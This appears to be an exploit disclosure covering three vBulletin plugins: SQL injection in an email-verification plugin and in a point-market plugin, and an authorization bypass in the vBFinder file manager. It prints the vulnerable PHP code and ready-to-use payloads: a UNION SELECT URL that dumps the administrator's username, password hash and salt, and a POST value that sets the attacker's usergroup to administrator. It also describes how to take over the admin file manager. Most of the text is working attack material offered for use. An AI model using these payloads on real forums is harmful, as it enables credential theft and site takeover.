vBulletin Verify Email Before Registration Plugin – SQL Injection

Plugin: http://www.vbulletin.org/forum/showthread.php?t=294164
Version: <= 2.0.6, patched in >= 2.0.7 (latest)

The vulnerability resides in the register_form_complete hook, and some other hooks.
First few lines of the register_form_complete hook:

if($so == 1){
	if($emailcode){
		$emailfromcode = $db->query_write("SELECT * FROM " . TABLE_PREFIX . "userregcode WHERE userregcode ='$emailcode';");
     
		if($db->num_rows($emailfromcode)){
			$emailfetched = $db->fetch_row($emailfromcode);
			$email = $emailconfirm = $emailfetched[1];
			$emailconfirmationcode = $emailcode;
		}else{
			eval(standard_error(fetch_error('thisemailhasbeenconfirmed')));
		}
	}
}
else{
	$code = md5(time()*rand());
}

The user input data is not sanitized before being used in queries. In this case we can exploit the $emailcode variable.

Proof of concept:
http://example.com/register.php?so=1&emailcode=1' UNION SELECT null, concat(username,0x3a,password,0x3a,salt), null, null, null, null FROM user WHERE userid = '1

Now look at the source of the page and find:


Vulnerable hooks:
profile_updatepassword_complete (Email field when you want to change your email address after being logged in.)
register_addmember_complete (After submitting the final registration form.)
register_addmember_process
register_form_complete (This example)
register_start (Email confirmation form at register.php)

vBulletin Point Market System Plugin – SQL Injection

Plugin: http://www.vbulletin.org/forum/showthread.php?t=232676
Version: 3.1.2 (latest)

The vulnerability resides in the pointmarket/market_purchase.php file.

One piece of code which is vulnerable, is the following:

// *********** Change User Name Glow *************
    if ($itembuy[marketid] == 15 AND $error == 0) {
        if (!$color) {
            $error = 9; // User did not select a color.
        }
        if ($error == 0) {
            if ($method != 4) {
        	$vbulletin->db->query_read("update " . TABLE_PREFIX . "user set $xperience `$payment`=$ppoints-$amount, market_purchases=market_purchases+1, market_username_glow='$color' where userid='$userid'");
            $vbulletin->db->query_read("insert into " . TABLE_PREFIX . "market_transactions set `expire_date`='$expire', `coupon`='$cid[id]', `date`='$time', marketid='$itembuy[marketid]', mid='$itembuy[mid]',  userid='$userid', affecteduser='$userid', `$pamount`='$amount'");
                // vBExperience Addon
            	if ($payment == "market_xperience") {
            	$vbulletin->db->query_write("update " . TABLE_PREFIX . "xperience_stats set points_xperience=points_xperience-$amount, points_shop=points_shop+$amount where userid='$userid'");
            	}            
            } else {
        	$vbulletin->db->query_read("update " . TABLE_PREFIX . "user set $xperience `$pointfield`=$points-$amount1, `$pointfield2`=$points2-$amount2, market_purchases=market_purchases+1, market_username_glow='$color' where userid='$userid'");
            $vbulletin->db->query_read("insert into " . TABLE_PREFIX . "market_transactions set `expire_date`='$expire', `coupon`='$cid[id]', `date`='$time', marketid='$itembuy[marketid]', mid='$itembuy[mid]',  userid='$userid', affecteduser='$userid', `amount`='$amount', `amount2`='$amount2'");
                // vBExperience Addon
        		if ($pointfield == "market_xperience") {
            	$vbulletin->db->query_write("update " . TABLE_PREFIX . "xperience_stats set points_xperience=points_xperience-$amount1, points_shop=points_shop+$amount1 where userid='$userid'");
            	}
                if ($pointfield2 == "market_xperience") {
            	$vbulletin->db->query_write("update " . TABLE_PREFIX . "xperience_stats set points_xperience=points_xperience-$amount2, points_shop=points_shop+$amount2 where userid='$userid'");
            	} 
            }
        }
    }

As you can see, many variables are not sanitized or checked before being inserted into the database. In this case we can abuse the $color variable. Since UPDATE statements are used, we can change the usergroup of our account to administrator and gain access to the admin control panel.

Note that in order to exploit this, you need access to the market and access to certain products in the market.

The following products, which you can buy in the market of this plugin, are vulnerable:
Change User Title Color, Change User Title Glow, Change User Name Color, Change User Name Glow, Post Font Face, Post Font Color, Thread Color.

Simply go to the product page and use any developer tool to change the value of the color/face POST value.

POST to: 	http://example.com/market.php?do=purchase
POST data:	payment1: 1
		item_id: 15
		color: 000000', usergroupid = '6
		securitytoken: yoursecuritytoken

Change the usergroupid to the usergroupid of the administrator usergroup, which is usually 6.

vBulletin SCANU’s vBFinder Plugin – Authorization Bypass

Plugin: http://www.vbulletin.org/forum/showthread.php?t=299490
Version: <= 0.2 (latest) The mistake in this plugin is that the author did not add any checks in the connecter file, he doesn't check if the user is currently logged in as an administrator. We can simply exploit this by making a .html file and by pointing all URL references to the admincp of a forum with this plugin. Proof of concept:


	
		
		
		
		

		
		
		

		
		

		
		

		
		
	
	
		
Loading…

This will establish a connection to the vulnerable host and will pop-up the file manager.
You can now download/upload/delete anything you want and browse through all of the files.